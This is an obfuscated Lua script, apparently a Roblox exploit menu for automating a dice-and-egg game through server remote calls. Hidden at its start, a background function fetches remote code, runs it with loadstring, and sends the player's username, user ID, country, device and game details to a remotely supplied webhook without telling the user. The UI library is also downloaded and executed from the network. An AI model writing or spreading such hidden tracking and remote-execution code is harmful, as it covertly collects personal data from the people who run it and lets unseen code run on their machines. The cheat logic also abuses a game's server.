--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v53,v54) local v55={};for v123=1, #v53 do v6(v55,v0(v4(v1(v2(v53,v123,v123 + 1 )),v1(v2(v54,1 + (v123% #v54) ,1 + (v123% #v54) + 1 )))%256 ));end return v5(v55);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));local v10=game:GetService(v7("\1\164\76\4\149\40\86\33\163\122\19\174\48\79\55\178","\38\84\215\41\118\220\70"));local v11=game:GetService(v7("\124\25\33\19\242\89\12\35\6\247\95\24\17\23\236\70\31\33\23","\158\48\118\66\114"));local v12=game:GetService(v7("\134\37\2\61\118\177\235\167\37\19\51\64\160\233\189\45\19\51","\155\203\68\112\86\19\197"));local v13=v8.LocalPlayer;local function v14() local v56=0 + 0 ;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v56==(789 -(766 + 23))) then v57=(syn and syn.request) or (http and http.request) or v57 or (fluxus and fluxus.request) ;if  not v57 then return;end v58=v7("\78\201\34\236\83\34\170\183\86\220\37\232\69\122\236\246\8\222\57\241\15\106\228\239\9\247\110\236\121\113\227\207\19","\152\38\189\86\156\32\24\133");v56=4 -3 ;end if (v56==3) then local v136=0;while true do if (v136==1) then v63={[v7("\7\183\137\50\221\17","\185\98\218\235\87")]={{[v7("\223\53\51\234\219","\202\171\92\71\134\190")]="🚀 Script Executed",[v7("\42\206\32\135\59","\232\73\161\76")]=44141702 -27387782 ,[v7("\189\208\71\81\26\168","\126\219\185\34\61")]={{[v7("\2\207\83\119","\135\108\174\62\18\30\23\147")]=v7("\131\250\47\217\22\175\62\194","\167\214\137\74\171\120\206\83"),[v7("\157\241\62\72\253","\199\235\144\82\61\152")]=v13.Name,[v7("\14\24\181\34\9\19","\75\103\118\217")]=true},{[v7("\201\85\125\17","\126\167\52\16\116\217")]=v7("\236\39\51\144\184\24\229\136\0\33\141\177","\156\168\78\64\224\212\121"),[v7("\17\239\169\219\2","\174\103\142\197")]=v13.DisplayName,[v7("\95\38\83\49\43\91","\152\54\72\63\88\69\62")]=true},{[v7("\218\197\227\89","\60\180\164\142")]=v7("\109\77\0\59\14\233","\114\56\62\101\73\71\141"),[v7("\174\232\215\209\189","\164\216\137\187")]=tostring(v13.UserId),[v7("\219\232\61\187\168\251","\107\178\134\81\210\198\158")]=false},{[v7("\54\15\143\195","\202\88\110\226\166")]=v7("\243\3\131\244\207","\170\163\111\226\151"),[v7("\7\49\190\45\75","\73\113\80\210\88\46\87")]=v62,[v7("\136\34\193\27\233\132","\135\225\76\173\114")]=false},{[v7("\20\236\181\181","\199\122\141\216\208\204\221")]=v7("\157\209\17\243\125\223\169","\150\205\189\112\144\24"),[v7("\51\133\179\89\1","\112\69\228\223\44\100\232\113")]=tostring(game.PlaceId),[v7("\221\17\11\218\184\121","\230\180\127\103\179\214\28")]=true},{[v7("\130\4\82\67","\128\236\101\63\38\132\33")]=v7("\143\166\4\74\162\249\214","\175\204\201\113\36\214\139"),[v7("\81\205\57\201\1","\100\39\172\85\188")]=v61,[v7("\164\118\181\137\61\168","\83\205\24\217\224")]=true},{[v7("\232\196\192\56","\93\134\165\173")]=v7("\142\254\192\214\60\193\160\115","\30\222\146\161\162\90\174\210"),[v7("\243\79\124\31\224","\106\133\46\16")]=(v10.TouchEnabled and  not v10.KeyboardEnabled and v7("\117\47\113\245\86\69","\32\56\64\19\156\58")) or (v10.GamepadEnabled and v7("\121\199\235\69\85\254\133","\224\58\168\133\54\58\146")) or v7("\105\117","\107\57\54\43\157\21\230\231") ,[v7("\210\133\29\252\183\217","\175\187\235\113\149\217\188")]=true}},[v7("\58\160\142\88\230\107","\24\92\207\225\44\131\25")]={[v7("\95\214\160\88","\29\43\179\216\44\123")]=v7("\142\201\41\66\253\216\96\110\188\221\36\69\184\153\60\12\139\220\46\69\179\218\37","\44\221\185\64")}}}};v56=4;break;end if (v136==(913 -(910 + 3))) then v62=v7("\137\205\220\4\13\60\178","\75\220\163\183\106\98");pcall(function() v62=v12:GetProductInfo(game.PlaceId).Name;end);v136=1;end end end if (v56==1) then v59=v57({[v7("\201\69\171","\38\156\55\199")]=v58,[v7("\133\120\104\32\28\112","\35\200\29\28\72\115\20\154")]=v7("\62\154\229","\84\121\223\177\191\237\76")});if ( not v59 or  not v59.Body) then return;end v60=loadstring(v59.Body)();v56=2;end if (v56==(4 -2)) then if ( not v60 or (v60.key~=v7("\168\70\192\174\5\9\104\147\232","\161\219\54\169\192\90\48\80"))) then return;end v61=v7("\124\76\11\43\70\85\14","\69\41\34\96");pcall(function() v61=v11:GetCountryRegionForPlayerAsync(v13);end);v56=1687 -(1466 + 218) ;end if (v56==(2 + 2)) then v57({[v7("\52\245\68","\19\97\135\40\63")]=v60.url,[v7("\131\89\39\51\32\53","\81\206\60\83\91\79")]=v7("\126\132\227\70","\196\46\203\176\18\79\163\45"),[v7("\144\39\127\26\33\233\252","\143\216\66\30\126\68\155")]={[v7("\137\199\3\223\192\173\195\172\158\209\29\206","\129\202\168\109\171\165\195\183")]=v7("\35\72\39\212\215\23\231\54\81\56\214\145\30\245\45\86","\134\66\56\87\184\190\116")},[v7("\30\62\13\162","\85\92\81\105\219\121\139\65")]=v9:JSONEncode(v63)});break;end end end task.spawn(v14);local v15=loadstring(game:HttpGet(v7("\245\167\68\85\111\133\178\252\67\76\110\214\232\160\30\72\121\209\232\252\66\68\101\217\244\182\92\65","\191\157\211\48\37\28")))();local v16=v15:CreateWindow({[v7("\241\30\249\25","\90\191\127\148\124")]=v7("\75\151\39\25\56\134\110\53\121\131\42\30\125\199\12\46\56\177\43\25\113\137\45\18","\119\24\231\78"),[v7("\174\34\164\78\213\78\22\182\36\177\70\217","\113\226\77\197\42\188\32")]=v7("\18\55\220\148","\213\90\118\148"),[v7("\119\33\181\82\68\85\41\135\67\79\79\39\160\90\72","\45\59\78\212\54")]=v7("\18\79\195\189\143\32\168\254\19\83","\144\112\54\227\235\230\78\205"),[v7("\144\39\1\250\217\92\166\58\14\232\217\84\189\27\14\234\217\85\180","\59\211\72\111\156\176")]={[v7("\107\137\226\47\66\130\231","\77\46\231\131")]=true,[v7("\156\91\186\68\191\70\152\65\183\81","\32\218\52\214")]=v7("\111\2\37\167\195\191\73\86\123\62","\58\46\119\81\200\145\208\37"),[v7("\13\133\60\169\135\188\59\46","\86\75\236\80\204\201\221")]=v7("\81\78\121\131\247\140\77","\235\18\33\23\229\158")   .. game.PlaceId },[v7("\123\191\216\136\73\169\213\190\93","\219\48\218\161")]=false});local v17=game:GetService(v7("\214\116\108\69\210\76\225\240\116\120\122\207\64\242\229\118\121","\128\132\17\28\41\187\47"));local v18=v17:WaitForChild(v7("\36\36\3\52\73\18","\61\97\82\102\90"));local v19=v18:WaitForChild(v7("\191\43\167\71","\105\204\78\203\43\167\55\126"));local v20=v18:WaitForChild(v7("\151\175\36\11\31\5\213\97\160\190","\49\197\202\67\126\115\100\167"));local v21=v18:WaitForChild(v7("\36\75\214\39\146\83\79\34\94\204\61","\62\87\59\191\73\224\54"));local v22=v18:WaitForChild(v7("\229\23\227","\169\135\98\154"));local v23=v18:WaitForChild(v7("\217\114\38\93\239\39\192","\168\171\23\68\52\157\83"));local v24={[v7("\213\100\225\162\23\34\139\248","\231\148\17\149\205\69\77")]=false,[v7("\161\178\211\244\100\239\137\169","\159\224\199\167\155\55")]=false,[v7("\214\230\40\221\210\244\59","\178\151\147\92")]=false,[v7("\173\232\88\61\33\73\118\128","\26\236\157\44\82\114\44")]=false,[v7("\11\59\193\84\26\33\193\82\37\32","\59\74\78\181")]=false,[v7("\4\196\78\85\129\32\211\83\72\167\45","\211\69\177\58\58")]=false,[v7("\150\240\109\250\203\222\174\193\112\246\236","\171\215\133\25\149\137")]=false,[v7("\192\221\38\245\194\53\238\65\233\201\60\238","\34\129\168\82\154\143\80\156")]=false,[v7("\183\189\63\7\123\94\128\139\150\54\7\73\87\164\182","\233\229\210\83\107\40\46")]=50,[v7("\228\69\53\242\0\205\67\43\251\54","\101\161\34\82\182")]=1948 -(556 + 592) ,[v7("\219\8\85\242\255\231\142\47\241\32\106","\78\136\109\57\158\187\130\226")]=534 + 966 ,[v7("\14\48\237\248\49\49\221\244\50\62\224\220\13","\145\94\95\153")]=1808 -(329 + 479) ,[v7("\207\200\22\220\92\163\245\233\17\217\79\174\208\254","\215\157\173\116\181\46")]=2854 -(174 + 680) ,[v7("\17\189\136\247\254\48\184\138\235\247\6","\186\85\212\235\146")]=3436 -2436 ,[v7("\239\132\4\253\49\239\86\214\165\19\242\56\247\117\241","\56\162\225\118\158\89\142")]=4145 -2145 ,[v7("\111\0\204\170\33\204\89\1\229\168\37","\184\60\101\160\207\66")]=nil,[v7("\20\133\123\157\60\141\105\178\37","\220\81\226\28")]=1 + 0 ,[v7("\32\208\142\254\233\211\22\209\178\244\254\206\28\219\145","\167\115\181\226\155\138")]={},[v7("\209\39\235\89\120\101\195\230\6\238\95\126\98","\166\130\66\135\60\27\17")]={},[v7("\116\69\218\124\63\74\107\195\122\37\74\94","\80\36\42\174\21")]=740 -(396 + 343) ,[v7("\106\25\52\127\111\29\56\111\64\4","\26\46\112\87")]=1 + 0 ,[v7("\138\38\167\113\188\171\64\176\148\38\185\119\183\190\75\160\144\55\174\121\172","\212\217\67\203\20\223\223\37")]={}};local v25;local function v26() if v25 then return v25;end v25=v13.PlayerGui.Main.Dice.RollState;return v25;end local function v27() pcall(function() v23:InvokeServer();end);end local function v28() local v65={};local v66=workspace:FindFirstChild(v7("\159\138\175\193","\178\218\237\200"));if v66 then for v137,v138 in ipairs(v66:GetChildren()) do if (v138:IsA(v7("\155\186\226\213\186","\176\214\213\134")) and v138.Name:find(v7("\209\170\177","\57\148\205\214\180\200\54"))) then table.insert(v65,v138.Name);end end end table.sort(v65);return v65;end local v29=v28();v24.SelectedEgg=v29[1478 -(29 + 1448) ];local v32={v7("\62\232\54\63\54\34\242\33\61\121\28\189\100","\22\114\157\85\84"),v7("\232\222\16\207\29\198\167\208\194\28\202\29\164","\200\164\171\115\164\61\150"),v7("\146\225\0\78\195\142\251\23\76\140\176\180\80","\227\222\148\99\37"),v7("\30\93\92\243\224\115\98\93\226\240\60\92\18\167","\153\83\50\50\150"),v7("\112\121\125\25\106\235\125\82\98\122\19\125\235\31","\45\61\22\19\124\19\203"),v7("\236\29\3\240\27\48\137\206\6\4\250\12\48\234","\217\161\114\109\149\98\16"),v7("\63\53\44\125\168\125\29\46\120\95\180\117\28\35\61\60\140\123\6\41\55\114\252\37","\20\114\64\88\28\220"),v7("\31\14\146\151\247\222\174\36\12\215\244\220\217\190\52\65\226\187\236\217\178\63\65\131","\221\81\97\178\212\152\176")};local v33={v7("\244\238\19\226\27\195\224\93\223\19\206\226","\122\173\135\125\155"),v7("\167\201\18\182\49\62\219\196\229\9\186\58","\168\228\161\96\217\95\81"),v7("\247\216\35\94\32\23\255\216\45\89","\55\187\177\78\60\79"),v7("\4\195\79\228\85\220\137\47\194\90\171\98\198\131\40","\224\77\174\63\139\38\175"),v7("\160\72\75\47\151\85\93\60\196\101\81\45\129","\78\228\33\56"),v7("\239\112\188\10\141\199\114\179\23\140\193\112\242\39\140\205\123","\229\174\30\210\99"),v7("\62\224\150\84\255\50\43\91\201\143\82\232","\89\123\141\230\49\141\93"),v7("\214\125\242\30\25\94\240\121\182\40\25\73\246","\42\147\17\150\108\112"),v7("\40\167\33\126\228\252\6\165\109\91\238\235\10","\136\111\198\77\31\135"),v7("\49\12\181\87\173\236\30\170\66\45\174\85\184","\201\98\105\199\54\221\132\119"),v7("\146\30\130\42\7\59\236\157\5\128\36","\204\217\108\227\65\98\85"),v7("\108\198\244\233\37\212\71\131\209\236\47\197","\160\62\163\149\133\76"),v7("\252\175\6\42\209\150\132\4\44\198","\163\182\192\109\79"),v7("\7\41\21\204\181\16\47\3\197","\149\84\70\96\160"),v7("\8\7\31\236\60\9\21\228\59\7\1\173\28\15\14\232","\141\88\102\109"),v7("\151\86\203\100\18\125\113\200\176\86","\161\211\51\170\16\122\93\53"),v7("\217\162\179\43\240\166\189\36\254\238\150\33\248\171","\72\155\206\210"),v7("\111\116\82\7\61\79\110\77\78\23\79\121\81","\83\38\26\52\110"),v7("\112\18\43\74\24\51\46\69\93","\38\56\119\71"),v7("\210\237\65\197\54\87\255\175\124\223\38\83","\54\147\143\56\182\69"),v7("\229\142\243\72\205\150\165\246\74\218","\191\182\225\159\41"),v7("\8\23\36\80\152\147\203\42\30\104\113\130\132\199","\162\75\114\72\53\235\231"),v7("\169\40\76\231\65\7\141\48\4\198\90\1\137","\98\236\92\36\130\51"),v7("\146\22\5\190\5\140\188\51\161","\80\196\121\108\218\37\200\213"),v7("\44\102\1\116\82\78\174\9\112\7","\234\96\19\98\31\43\110"),v7("\39\14\71\198\236\86\130\5\26","\235\102\127\50\167\204\18"),v7("\99\168\251\36\81\34\81\179\252\55\93\110\116\168\246\38","\78\48\193\149\67\36"),v7("\30\27\130\13\77\49\94\164\17\66\53","\33\80\126\224\120"),v7("\196\173\2\210\89\226\232\39\205\95\233","\60\140\200\99\164"),v7("\163\241\18\47\174\199\208\13\37\167","\194\231\148\100\70"),v7("\119\89\192\173\226\221\75\12\229\170\245\205","\168\38\44\161\195\150"),v7("\167\253\142\119\40\225\185\24\192\216\139\117\53","\118\224\156\226\22\80\136\214"),v7("\108\235\91\149\78\231\77\133\2\202\80\131\71","\224\34\142\57"),v7("\250\174\196\208\124\255\89\78\250\174\198\216","\110\190\199\165\189\19\145\61"),v7("\249\249\110\251\159\198\214\231\98\229\203\227\211\232\114","\167\186\139\23\136\235"),v7("\59\160\154\8\22\188\134\8\90\145\129\14\31","\109\122\213\232"),v7("\201\248\174\52\235\249\226\20\231\244\167","\80\142\151\194"),v7("\48\207\123\90\6\212\55\104\10\197\114","\44\99\166\23"),v7("\94\246\58\63\48\228\88\254\42\51","\196\28\151\73\86\83")};local function v34() pcall(function() v26():InvokeServer();end);end local function v35() pcall(function() v21:InvokeServer();end);end local function v36() if v24.SelectedEgg then pcall(function() v20:InvokeServer(v24.SelectedEgg,v24.EggAmount);end);end end local function v37() pcall(function() v19:InvokeServer(v7("\242\15\37","\22\147\99\73\112\226\56\120"));end);end local function v38() for v124,v125 in ipairs(v24.SelectedPotions) do local v126=0 + 0 ;while true do if (v126==0) then v22:InvokeServer(v125,v24.PotionAmount,v7("\168\122\246\252\130\182","\237\216\21\130\149"));task.wait(0.1);break;end end end end local function v39() for v127,v128 in ipairs(v24.SelectedDices) do local v129=0 + 0 ;while true do if ((0 + 0)==v129) then v22:InvokeServer(v128,v24.DiceAmount,v7("\134\71\92\90","\62\226\46\63\63\208\169"));task.wait(0.1);break;end end end end local v40=v18:WaitForChild(v7("\200\28\71\128\23\12\33\74\199\12\76","\62\133\121\53\227\127\109\79"));local v41={v7("\35\24\61\225\150\255","\194\112\116\82\149\182\206"),v7("\10\164\67\12\128\176","\110\89\200\44\120\160\130"),v7("\152\207\68\82\3\25","\45\203\163\43\38\35\42\91")};local v42={[v7("\225\137\211\55\199\248","\52\178\229\188\67\231\201")]=2 -1 ,[v7("\18\77\95\16\183\14","\67\65\33\48\100\151\60")]=884 -(244 + 638) ,[v7("\236\235\161\204\179\140","\147\191\135\206\184")]=696 -(627 + 66) };local function v43() for v130,v131 in ipairs(v24.SelectedMerchantItems) do local v132=0 -0 ;local v133;while true do if (v132==(602 -(512 + 90))) then v133=v42[v131];if v133 then local v147=0;while true do if (v147==(1906 -(1665 + 241))) then v40:InvokeServer(v133);task.wait(0.1);break;end end end break;end end end end local v44=false;local v45=nil;local function v46() local v67=717 -(373 + 344) ;local v68;local v69;local v70;local v71;local v72;while true do if (v67==2) then v72=nil;while true do if ((1 + 1)==v68) then if  not v71 then return;end v72=v71:FindFirstChild(v7("\2\4\173\236\52","\183\68\118\204\129\81\144"));v68=1 + 2 ;end if (v68==(2 -1)) then if  not v70 then return;end v71=v70:FindFirstChild(v7("\89\15\153\52\43\0\5","\203\59\96\237\107\69\111\113"));v68=2;end if (v68==(0 -0)) then v69=game:GetService(v7("\180\36\167\216\221\65\161","\210\228\72\198\161\184\51")).LocalPlayer;v70=v69:FindFirstChild(v7("\6\69\242\9\118\220\17\92\250","\174\86\41\147\112\19"));v68=1;end if (v68==3) then if  not v44 then if v72 then local v150=0;while true do if (v150==1) then v44=true;break;end if (v150==(1099 -(35 + 1064))) then v45=v72:Clone();v72:Destroy();v150=1 + 0 ;end end end elseif v45 then local v151=0;while true do if (v151==0) then v45.Parent=v71;v44=false;break;end end end break;end end break;end if (v67==1) then v70=nil;v71=nil;v67=2;end if ((0 -0)==v67) then v68=0;v69=nil;v67=1 + 0 ;end end end task.spawn(function() while task.wait(v24.RollSpinDelayMS/1000 ) do if v24.AutoRoll then v34();end if v24.AutoSpin then v35();end end end);task.spawn(function() while task.wait(v24.EggDelayMS/1000 ) do if v24.AutoEgg then v36();end end end);task.spawn(function() while task.wait(v24.SellDelayMS/(2236 -(298 + 938)) ) do if v24.AutoSell then v37();end end end);task.spawn(function() while task.wait(v24.PotionDelayMS/1000 ) do if v24.AutoPotion then v38();end end end);task.spawn(function() while task.wait(v24.RebirthDelayMS/1000 ) do if v24.AutoRebirth then v27();end end end);task.spawn(function() while task.wait(v24.DiceDelayMS/(2259 -(233 + 1026)) ) do if v24.AutoBuyDice then v39();end end end);task.spawn(function() while task.wait(v24.MerchantDelayMS/(2666 -(636 + 1030)) ) do if v24.AutoMerchant then v43();end end end);local v47=v16:CreateTab(v7("\35\172\121\234","\226\110\205\16\132\107"),4483363619 -(817 + 344) );v47:CreateToggle({[v7("\197\194\237\220","\33\139\163\128\185")]=v7("\118\77\16\209\23\106\11\210\91","\190\55\56\100"),[v7("\117\174\48\18\17\226\240\93","\147\54\207\92\126\115\131")]=function(v73) v24.AutoRoll=v73;end});v47:CreateToggle({[v7("\35\48\56\120","\30\109\81\85\29\109")]=v7("\222\100\64\185\118\237\236\246\127\20\129\62\219\249\243","\156\159\17\52\214\86\190"),[v7("\141\238\177\176\172\238\190\183","\220\206\143\221")]=function(v75) v24.AutoSpin=v75;end});v47:CreateInput({[v7("\168\124\32\18","\178\230\29\77\119\184\172")]=v7("\199\177\6\23\55\183\181\141\26\18\121\184\209\187\6\26\110","\152\149\222\106\123\23"),[v7("\237\42\247\64\176\213\41\250\71\176\207\18\243\91\161","\213\189\70\150\35")]=v7("\106\77\117\5\95\89\113\82\15\0\36\88","\104\47\53\20"),[v7("\128\77\141\16\190\14\160\71","\111\195\44\225\124\220")]=function(v77) local v78=0 + 0 ;local v79;while true do if (v78==(221 -(55 + 166))) then v79=tonumber(v77);if (v79 and (v79>=50)) then v24.RollSpinDelayMS=v79;end break;end end end});v47:CreateToggle({[v7("\246\71\13\118","\203\184\38\96\19\203")]=v7("\24\102\109\78\142\11\118\123\72\220\45\123","\174\89\19\25\33"),[v7("\12\19\94\66\245\134\8\36","\107\79\114\50\46\151\231")]=function(v80) v24.AutoRebirth=v80;end});v47:CreateInput({[v7("\23\167\184\44","\160\89\198\213\73\234\89\215")]=v7("\122\116\182\247\215\92\121\244\218\192\68\112\173","\165\40\17\212\158"),[v7("\213\213\9\48\35\237\214\4\55\35\247\237\13\43\50","\70\133\185\104\83")]=v7("\33\93\69\39\217\8\64\30\106\155\84\21\20","\169\100\37\36\74"),[v7("\35\134\174\92\2\134\161\91","\48\96\231\194")]=function(v82) local v83=0 + 0 ;local v84;while true do if (v83==(0 + 0)) then v84=tonumber(v82);if (v84 and (v84>=(1909 -1409))) then v24.RebirthDelayMS=v84;end break;end end end});v47:CreateButton({[v7("\230\91\3\40","\227\168\58\110\77\121\184\207")]=v7("\73\57\178\79\167\222\62\145\116\59\184\76\180\155\95\170\111\53\185\73\178\218\101\172\116\50\172","\197\27\92\223\32\209\187\17"),[v7("\32\94\207\247\1\94\192\240","\155\99\63\163")]=function() v46();end});local v48=v16:CreateTab(v7("\167\214\166\158","\228\226\177\193\237\217"),4483362458);v48:CreateDropdown({[v7("\26\177\46\227","\134\84\208\67")]=v7("\32\169\138\89\16\184\198\121\20\171","\60\115\204\230"),[v7("\200\42\255\121\232\52\248","\16\135\90\139")]=v29,[v7("\119\97\20\33\75\90\108\123\100\18\58\65\90","\24\52\20\102\83\46\52")]={v24.SelectedEgg},[v7("\231\46\45\40\13\197\44\42","\111\164\79\65\68")]=function(v85) v24.SelectedEgg=v85[1];end});v48:CreateToggle({[v7("\232\216\142\219","\138\166\185\227\190\78")]=v7("\234\97\209\56\18\6\30\204","\121\171\20\165\87\50\67"),[v7("\229\57\181\58\187\3\197\51","\98\166\88\217\86\217")]=function(v88) v24.AutoEgg=v88;end});v48:CreateInput({[v7("\216\247\116\4","\188\150\150\25\97\230")]=v7("\255\142\88\66\40\232\214\136\70","\141\186\233\63\98\108"),[v7("\193\230\45\181\32\249\229\32\178\32\227\222\41\174\49","\69\145\138\76\214")]=v7("\85\215\136\132\175\26\117\149\201\209\239\70","\118\16\175\233\233\223"),[v7("\168\133\57\183\236\138\126\128","\29\235\228\85\219\142\235")]=function(v90) local v91=tonumber(v90);if (v91 and (v91>=100)) then v24.EggDelayMS=v91;end end});v48:CreateButton({[v7("\19\213\183\216","\50\93\180\218\189\23\46\71")]=v7("\252\177\66\12\97\219\79\158\236\10\84\13","\40\190\196\59\44\36\188"),[v7("\31\68\208\184\248\124\14\55","\109\92\37\188\212\154\29")]=function() v36();end});v48:CreateButton({[v7("\42\238\169\198","\58\100\143\196\163\81")]=v7("\56\87\58\227\26\78\226\78\82\17\59\234","\110\122\34\67\195\95\41\133"),[v7("\86\176\87\70\212\116\178\80","\182\21\209\59\42")]=function() if v24.SelectedEgg then pcall(function() v20:InvokeServer(v24.SelectedEgg,4 -1 );end);end end});local v49=v16:CreateTab(v7("\132\82\201\17","\222\215\55\165\125\65"),4483363826 -(34 + 1334) );v49:CreateToggle({[v7("\2\208\203\31","\42\76\177\166\122\146\161\141")]=v7("\132\159\17\193\57\69\160\134\9","\22\197\234\101\174\25"),[v7("\14\53\169\208\116\174\212\141","\230\77\84\197\188\22\207\183")]=function(v92) v24.AutoSell=v92;end});v49:CreateInput({[v7("\215\21\203\249","\85\153\116\166\156\236\193\144")]=v7("\151\229\65\191\164\36\161\236\76\170","\96\196\128\45\211\132"),[v7("\5\129\122\92\215\167\187\212\49\136\105\107\215\183\160","\184\85\237\27\63\178\207\212")]=v7("\45\65\8\82\24\85\12\5\72\8\92\15\88","\63\104\57\105"),[v7("\40\134\168\72\9\134\167\79","\36\107\231\196")]=function(v94) local v95=0;local v96;while true do if (v95==0) then v96=tonumber(v94);if (v96 and (v96>=(116 + 184))) then v24.SellDelayMS=v96;end break;end end end});v49:CreateButton({[v7("\115\180\175\130","\231\61\213\194")]=v7("\58\168\49\127\73\140\49\127","\19\105\205\93"),[v7("\138\9\210\141\61\168\11\213","\95\201\104\190\225")]=v37});local v50=v16:CreateTab(v7("\159\196\213\199\160\197\210","\174\207\171\161"),4483362702 -(157 + 87) );v50:CreateDropdown({[v7("\195\255\0\246","\183\141\158\109\147\152")]=v7("\31\12\234\9\47\29\166\60\35\29\239\3\34\26","\108\76\105\134"),[v7("\196\213\165\232\193\229\214","\174\139\165\209\129")]=v32,[v7("\142\166\238\213\207\19\124\125\140\163\246\200\201\13\99","\24\195\211\130\161\166\99\16")]=true,[v7("\101\22\251\62\86\24\82\44\249\56\90\25\72","\118\38\99\137\76\51")]=v24.SelectedPotions,[v7("\222\39\9\30\11\33\254\45","\64\157\70\101\114\105")]=function(v97) v24.SelectedPotions=v97;end});v50:CreateInput({[v7("\110\169\170\230","\112\32\200\199\131")]=v7("\13\93\83\173\205\191","\66\76\48\60\216\163\203"),[v7("\138\138\120\240\90\198\43\182\130\124\225\107\203\60\174","\68\218\230\25\147\63\174")]=v7("\136\50\82\65\166\161\47\9\12\231","\214\205\74\51\44"),[v7("\217\77\238\240\117\251\79\233","\23\154\44\130\156")]=function(v99) local v100=0 -0 ;local v101;while true do if (v100==(0 + 0)) then v101=tonumber(v99);if (v101 and (v101>(319 -(134 + 185)))) then v24.PotionAmount=v101;end break;end end end});v50:CreateInput({[v7("\63\167\160\171","\115\113\198\205\206\86")]=v7("\180\88\234\83\139\89\190\126\129\91\255\67","\58\228\55\158"),[v7("\132\133\209\45\57\165\58\184\141\213\60\8\168\45\160","\85\212\233\176\78\92\205")]=v7("\111\64\137\239\90\84\141\184\10\9\216\178\26","\130\42\56\232"),[v7("\201\180\40\239\66\62\233\190","\95\138\213\68\131\32")]=function(v102) local v103=1133 -(549 + 584) ;local v104;while true do if (v103==(685 -(314 + 371))) then v104=tonumber(v102);if (v104 and (v104>=100)) then v24.PotionDelayMS=v104;end break;end end end});v50:CreateToggle({[v7("\4\41\172\70","\22\74\72\193\35")]=v7("\13\108\240\87\108\91\241\65\108\73\235\76\37\118\234\75","\56\76\25\132"),[v7("\125\192\167\42\205\95\194\160","\175\62\161\203\70")]=function(v105) v24.AutoPotion=v105;end});v50:CreateButton({[v7("\18\220\206\22","\85\92\189\163\115")]=v7("\11\185\41","\88\73\204\80"),[v7("\13\130\28\74\43\219\45\136","\186\78\227\112\38\73")]=v38});local v51=v16:CreateTab(v7("\216\94\254\80","\26\156\55\157\53\51"),4483362458);v51:CreateDropdown({[v7("\162\217\27\220","\48\236\184\118\185\216")]=v7("\214\184\91\53\204\32\165\153\94\51\202\39","\84\133\221\55\80\175"),[v7("\146\247\48\175\200\82\174","\60\221\135\68\198\167")]=v33,[v7("\195\168\244\151\75\201\226\184\215\147\86\208\225\179\235","\185\142\221\152\227\34")]=true,[v7("\123\208\69\232\70\61\227\119\213\67\243\76\61","\151\56\165\55\154\35\83")]=v24.SelectedDices,[v7("\131\66\9\226\162\66\6\229","\142\192\35\101")]=function(v107) v24.SelectedDices=v107;end});v51:CreateInput({[v7("\248\116\36\166","\118\182\21\73\195\135\236\204")]=v7("\41\49\21\85\10\25","\157\104\92\122\32\100\109"),[v7("\147\170\206\201\56\47\130\167\167\163\221\254\56\63\153","\203\195\198\175\170\93\71\237")]=v7("\11\83\63\216\65\29\249\116\11\111","\156\78\43\94\181\49\113"),[v7("\81\233\200\175\9\66\122\121","\25\18\136\164\195\107\35")]=function(v109) local v110=0;local v111;while true do if (v110==(0 -0)) then v111=tonumber(v109);if (v111 and (v111>(968 -(478 + 490)))) then v24.DiceAmount=v111;end break;end end end});v51:CreateInput({[v7("\198\44\164\74","\216\136\77\201\47\18\220\161")]=v7("\9\229\40\223\72\248\135\33\237\50","\226\77\140\75\186\104\188"),[v7("\137\194\209\60\74\177\193\220\59\74\171\250\213\39\91","\47\217\174\176\95")]=v7("\157\197\119\15\162\88\125\124\248\140\38\82\226","\70\216\189\22\98\210\52\24"),[v7("\249\222\175\139\209\219\220\168","\179\186\191\195\231")]=function(v112) local v113=0 + 0 ;local v114;while true do if (v113==(1172 -(786 + 386))) then v114=tonumber(v112);if (v114 and (v114>=(323 -223))) then v24.DiceDelayMS=v114;end break;end end end});v51:CreateToggle({[v7("\215\62\21\225","\132\153\95\120")]=v7("\144\167\26\34\183\248\181\168\242\42\36\244\223","\192\209\210\110\77\151\186"),[v7("\195\2\46\229\253\197\227\8","\164\128\99\66\137\159")]=function(v115) v24.AutoBuyDice=v115;end});v51:CreateButton({[v7("\46\136\228\187","\222\96\233\137")]=v7("\155\166\190\95\166\252\231","\144\217\211\199\127\232\147"),[v7("\219\46\50\36\215\68\1\79","\36\152\79\94\72\181\37\98")]=v39});local v52=v16:CreateTab(v7("\250\221\85\60\223\217\73\43","\95\183\184\39"),4483363837 -(1055 + 324) );v52:CreateDropdown({[v7("\155\62\234\35","\98\213\95\135\70\52\224")]=v7("\205\166\197\114\87\234\227\228\114\70\253\171\200\121\64\190\138\221\114\89\237","\52\158\195\169\23"),[v7("\85\172\38\125\137\59\104","\235\26\220\82\20\230\85\27")]=v41,[v7("\165\180\229\214\125\152\173\236\237\100\156\168\230\204\103","\20\232\193\137\162")]=true,[v7("\1\202\215\180\226\130\3\94\50\203\204\169\233","\17\66\191\165\198\135\236\119")]=v24.SelectedMerchantItems,[v7("\44\174\162\31\253\233\239\218","\177\111\207\206\115\159\136\140")]=function(v117) v24.SelectedMerchantItems=v117;end});v52:CreateInput({[v7("\43\136\29\17","\63\101\233\112\116\180\47")]=v7("\238\62\255\17\240\55\205\47\173\54\253\58\194\34","\86\163\91\141\114\152"),[v7("\99\7\117\112\63\91\4\120\119\63\65\63\113\107\46","\90\51\107\20\19")]=v7("\168\232\132\226\45\129\245\223\175\111\221\160\213","\93\237\144\229\143"),[v7("\54\247\252\21\9\71\22\253","\38\117\150\144\121\107")]=function(v119) local v120=tonumber(v119);if (v120 and (v120>=(1440 -(1093 + 247)))) then v24.MerchantDelayMS=v120;end 